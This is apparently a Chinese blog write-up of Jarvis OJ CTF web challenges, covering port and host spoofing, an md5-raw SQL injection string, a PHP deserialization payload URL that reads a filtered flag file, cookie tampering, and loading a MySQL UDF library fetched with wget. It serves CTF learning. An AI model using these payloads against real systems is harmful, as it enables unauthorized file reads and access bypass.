<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#6200ee"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>Jarvis OJ—Web | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.24/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_j5gk85dg4pf.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" href="/m0re.ico"><link rel="mask-icon" href="/m0re.ico" color="#6200ee"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"m0re.top","root":"/","title":"人生路漫漫","version":"1.6.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="Web PORT51使用51端口，但是修改端口的话，32770就不是这道题的了，所以应该是使用本地的端口51来访问。所以就需要用到curl命令。curl命令可以进行学习一下，回头有空学习一下。 LOCALHOST本地访问，简单题，设置一下hosts文件就行，将题目网址加上去就OK。也可以使用插件刷新一下得到flag Login登录，但是尝试了几个弱口令，还进行了爆破，不过没有得到flag，所以抓">
<meta property="og:type" content="article">
<meta property="og:title" content="Jarvis OJ—Web">
<meta property="og:url" content="https://m0re.top/posts/d477b3b0/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="Web PORT51使用51端口，但是修改端口的话，32770就不是这道题的了，所以应该是使用本地的端口51来访问。所以就需要用到curl命令。curl命令可以进行学习一下，回头有空学习一下。 LOCALHOST本地访问，简单题，设置一下hosts文件就行，将题目网址加上去就OK。也可以使用插件刷新一下得到flag Login登录，但是尝试了几个弱口令，还进行了爆破，不过没有得到flag，所以抓">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/37896303389d3860251a30ef29e16fc5.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/ebeb969b0ac2e500f027a259e5a55530.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/9d473db12b5d6fc4c76ab77675a790c2.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/6f39de5031ff17932594966ff0367d17.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/247ee19eae65aa8a914695b45a345936.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/f4c245b6f99671db6398c9468fc3b0bd.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/a389536a8f5e79cb3f45ef1b390faf0c.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/82b7a43ba1f3a0864c140306f8080dbf.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/4bd3bc0a48b47fde9aff2a06bc6f072b.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/868d70b6a0b703b629f5bc91e4f2c773.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/629307fba54a066e4aaccfcbf0d5190c.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/afce5f78390754e87c7937abf60f7db2.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/6128d5d8faaefacdc691d5ccb5f559fd.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/38da3630cd4e559257abf7d5fa948f34.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020091916372713.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919171000838.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919171200817.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919171450389.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919171931642.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919173250610.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919173046638.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919175153236.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200919175411317.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/7fbb2c9e1294aabdbb27cae10cd2c772.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/aaf782b45e2b0847707dbd33e933ecd8.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/007c86e5dc85b9054c72248f188b8b5e.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/ff68583c230f3a14bf5069078c050e44.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/898b053e7e5b53038f1cd46d0f4887d6.png">
<meta property="article:published_time" content="2020-09-20T09:46:44.610Z">
<meta property="article:modified_time" content="2020-09-20T09:49:15.600Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="CTF题记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/img_convert/37896303389d3860251a30ef29e16fc5.png"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="m0re"><span class="site-author-status" title="穷鬼啊啊啊啊">😭</span></a><div class="site-author-name"><a href="/about/">m0re</a></div><span class="site-name">m0re的小站</span><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">125</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">23</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">55</span></a></div><a class="site-state-item hty-icon-button" href="/Tools/" title="Tools"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="哔哩哔哩动画" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:m0re.lxj@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-number">1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#PORT51"><span class="toc-number">1.1.</span> <span class="toc-text">PORT51</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#LOCALHOST"><span class="toc-number">1.2.</span> <span class="toc-text">LOCALHOST</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Login"><span class="toc-number">1.3.</span> <span class="toc-text">Login</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A5%9E%E7%9B%BE%E5%B1%80%E7%9A%84%E7%A7%98%E5%AF%86"><span class="toc-number">1.4.</span> <span class="toc-text">神盾局的秘密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#admin"><span class="toc-number">1.5.</span> <span class="toc-text">admin</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RE"><span class="toc-number">1.6.</span> <span class="toc-text">RE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%9C%A8%E7%AE%A1%E7%90%86%E5%91%98%E6%89%8B%E9%87%8C"><span class="toc-number">1.7.</span> <span class="toc-text">flag在管理员手里</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%88%AC"><span class="toc-number">1.8.</span> <span class="toc-text">爬</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%99%E6%98%AFbase"><span class="toc-number">1.9.</span> <span class="toc-text">这是base??</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://m0re.top/posts/d477b3b0/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Jarvis OJ—Web</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <span class="post-meta-icon-text">发表于</span> <time title="创建时间：2020-09-20 17:46:44" itemprop="dateCreated datePublished" datetime="2020-09-20T17:46:44+08:00">2020-09-20</time></div><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="leancloud_visitors" id="/posts/d477b3b0/" data-flag-title="Jarvis OJ—Web"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">网安学习</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/CTF%E9%A2%98%E8%AE%B0/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">CTF题记</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#6200ee;"><p><a name="93vek"></a></p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><p><a name="kWjfG"></a></p>
<h3 id="PORT51"><a href="#PORT51" class="headerlink" title="PORT51"></a>PORT51</h3><p><img src="https://img-blog.csdnimg.cn/img_convert/37896303389d3860251a30ef29e16fc5.png" alt="image.png" loading="lazy"><br><br />使用51端口，但是修改端口的话，32770就不是这道题的了，所以应该是使用本地的端口51来访问。所以就需要用到curl命令。<img src="https://img-blog.csdnimg.cn/img_convert/ebeb969b0ac2e500f027a259e5a55530.png" alt="image.png" loading="lazy"><br /><img src="https://img-blog.csdnimg.cn/img_convert/9d473db12b5d6fc4c76ab77675a790c2.png" alt="image.png" loading="lazy"><br />curl命令可以进行学习一下，回头有空学习一下。<br><a name="en9Hj"></a></p>
<h3 id="LOCALHOST"><a href="#LOCALHOST" class="headerlink" title="LOCALHOST"></a>LOCALHOST</h3><p>本地访问，简单题，设置一下hosts文件就行，将题目网址加上去就OK。<br />也可以使用插件<br /><img src="https://img-blog.csdnimg.cn/img_convert/6f39de5031ff17932594966ff0367d17.png" alt="image.png" loading="lazy"><br />刷新一下得到flag<br /><img src="https://img-blog.csdnimg.cn/img_convert/247ee19eae65aa8a914695b45a345936.png" alt="image.png" loading="lazy"><br><a name="yHF8Q"></a></p>
<h3 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h3><p>登录，但是尝试了几个弱口令，还进行了爆破，不过没有得到flag，所以抓包抓包看看返回结果<br /><img src="https://img-blog.csdnimg.cn/img_convert/f4c245b6f99671db6398c9468fc3b0bd.png" alt="image.png" loading="lazy"><br />这里有个hint，</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token string">"select * from `admin` where password='"</span><span class="token punctuation">.</span>md5<span class="token punctuation">(</span>$pass<span class="token punctuation">,</span><span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">"'"</span></code></pre>
<p>一条查询语句，pass经过md5加密，想起来之前的那个特殊例子。ffifdyop<br />看了我之前做得题发现，这个题跟那个是一样的[BJDCTF2020]Easy MD5<br /><img src="https://img-blog.csdnimg.cn/img_convert/a389536a8f5e79cb3f45ef1b390faf0c.png" alt="image.png" loading="lazy"><br><a name="NGkcy"></a></p>
<h3 id="神盾局的秘密"><a href="#神盾局的秘密" class="headerlink" title="神盾局的秘密"></a>神盾局的秘密</h3><p>这个就有点意思了，没有头绪，看了wp，下面自己解题过程<br />查看源码，发现base64字符串，<br /><img src="https://img-blog.csdnimg.cn/img_convert/82b7a43ba1f3a0864c140306f8080dbf.png" alt="image.png" loading="lazy"><br />先访问，<br /><img src="https://img-blog.csdnimg.cn/img_convert/4bd3bc0a48b47fde9aff2a06bc6f072b.png" alt="image.png" loading="lazy"><br />都是乱码，同时解出base64得到shield.jpg<br />这是一个文件包含，任意文件读取的漏洞，原因：谷歌浏览器是可以解析图片的，但是这个是图片，没有显示图片而是16进制，所以确定是文件包含漏洞了，<br />读取一下，showing.php<br />源代码中注释了</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token variable">$f</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'img'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token variable">$f</span> <span class="token operator">=</span> <span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'..'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token boolean constant">FALSE</span> <span class="token operator">&amp;&amp;</span> <span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'/'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token boolean constant">FALSE</span> <span class="token operator">&amp;&amp;</span> <span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'\\'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token boolean constant">FALSE</span>
		<span class="token operator">&amp;&amp;</span> <span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'pctf'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token boolean constant">FALSE</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token function">readfile</span><span class="token punctuation">(</span><span class="token variable">$f</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
			<span class="token keyword">echo</span> <span class="token double-quoted-string string">"File not found!"</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p>get传参，base64加密参数，并且进行过滤，过滤   ..   切换目录的操作，还有pctf字符串。<br />再读取index.php</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
	<span class="token keyword">require_once</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'shield.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$x</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Shield</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'class'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$g</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'class'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$g</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token variable">$x</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$g</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">echo</span> <span class="token variable">$x</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">readfile</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p>new了一个Shield对象，get进行传参，并且进行了反序列化处理。<br />尝试读取一下shield.php(c2hpZWxkLnBocA==)<br /><img src="https://img-blog.csdnimg.cn/img_convert/868d70b6a0b703b629f5bc91e4f2c773.png" alt="image.png" loading="lazy"></p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token comment">//flag is in pctf.php</span>
	<span class="token keyword">class</span> <span class="token class-name">Shield</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">public</span> <span class="token variable">$file</span><span class="token punctuation">;</span>
		<span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token variable">$filename</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token variable">$this</span> <span class="token operator">-</span><span class="token operator">></span> file <span class="token operator">=</span> <span class="token variable">$filename</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
		
		<span class="token keyword">function</span> <span class="token function">readfile</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">file</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">file</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'..'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token boolean constant">FALSE</span>  
			<span class="token operator">&amp;&amp;</span> <span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">file</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'/'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token boolean constant">FALSE</span> <span class="token operator">&amp;&amp;</span> <span class="token function">stripos</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">file</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'\\'</span><span class="token punctuation">)</span><span class="token operator">==</span><span class="token boolean constant">FALSE</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
				<span class="token keyword">return</span> @<span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
			<span class="token punctuation">&#125;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p>再读一下pctf.php<br />发现file not found<br />因为前面将pctf过滤了，所以可以利用反序列化漏洞，先将序列化结果跑出来<br /><img src="https://img-blog.csdnimg.cn/img_convert/629307fba54a066e4aaccfcbf0d5190c.png" alt="image.png" loading="lazy"><br />O:6:”Shield”:1:{s:4:”file”;s:8:”pctf.php”;}<br />payload</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">http://web.jarvisoj.com:32768/?class<span class="token operator">=</span>O:6:%22Shield%22:1:<span class="token punctuation">&#123;</span>s:4:%22file%22<span class="token punctuation">;</span>s:8:%22pctf.php%22<span class="token punctuation">;</span><span class="token punctuation">&#125;</span></code></pre>
<p>注释的，在源码里。<br /><img src="https://img-blog.csdnimg.cn/img_convert/afce5f78390754e87c7937abf60f7db2.png" alt="image.png" loading="lazy"><br />参考博客——<a target="_blank" rel="noopener" href="https://www.cnblogs.com/gaonuoqi/p/11649250.html">web—神盾局的秘密</a><br><a name="HChIH"></a></p>
<h3 id="admin"><a href="#admin" class="headerlink" title="admin"></a>admin</h3><p>没有发现信息，所以就进行dirsearch<br />发现了robots.txt，在robots.txt中看到了Disallow: /admin_s3cr3t.php<br />访问看到flag{hello, guest}，虽然猜到可能不是flag，但是还是尝试了一下。<br />果然不行，所以看看数据包的情况<br /><img src="https://img-blog.csdnimg.cn/img_convert/6128d5d8faaefacdc691d5ccb5f559fd.png" alt="image.png" loading="lazy"><br />根据以前的做题经验，这个地方应该有问题，所以抓包修改了一下，admin=1<br />就看到了<img src="https://img-blog.csdnimg.cn/img_convert/38da3630cd4e559257abf7d5fa948f34.png" alt="image.png" loading="lazy"><br><a name="5uqDa"></a></p>
<h3 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h3><p><img src="https://img-blog.csdnimg.cn/2020091916372713.png#pic_center" alt="m0re" loading="lazy"><br>emmm不会，了解的知识太太太太太太少了。参考大佬wp<br>关于mysql扩展函数</p>
<blockquote>
<p>有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候，就需要对MySQL进行一些扩展，使用者自行添加的MySQL函数就称为UDF(User Define Function)。</p>
</blockquote>
<p>题目中提示help_me函数挺有意思<br>在mysql命令行中使用<code>select @@plugin_dir;</code>查看mysql的插件目录<br><img src="https://img-blog.csdnimg.cn/20200919171000838.png#pic_center" alt="m0re" loading="lazy"><br>切换到该目录，下载源文件。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token function">wget</span> https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172</code></pre>

<p>然后重命名为udf.so<br><img src="https://img-blog.csdnimg.cn/20200919171200817.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>然后在命令行中创建help_me外部函数</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">create</span> <span class="token keyword">function</span> help_me <span class="token keyword">returns</span> string <span class="token keyword">soname</span> <span class="token string">'udf.so'</span><span class="token punctuation">;</span></code></pre>
<p>然后调用help_me函数<br><img src="https://img-blog.csdnimg.cn/20200919171450389.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>发现还要调用getflag函数，所以再次创建函数<br><img src="https://img-blog.csdnimg.cn/20200919171931642.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
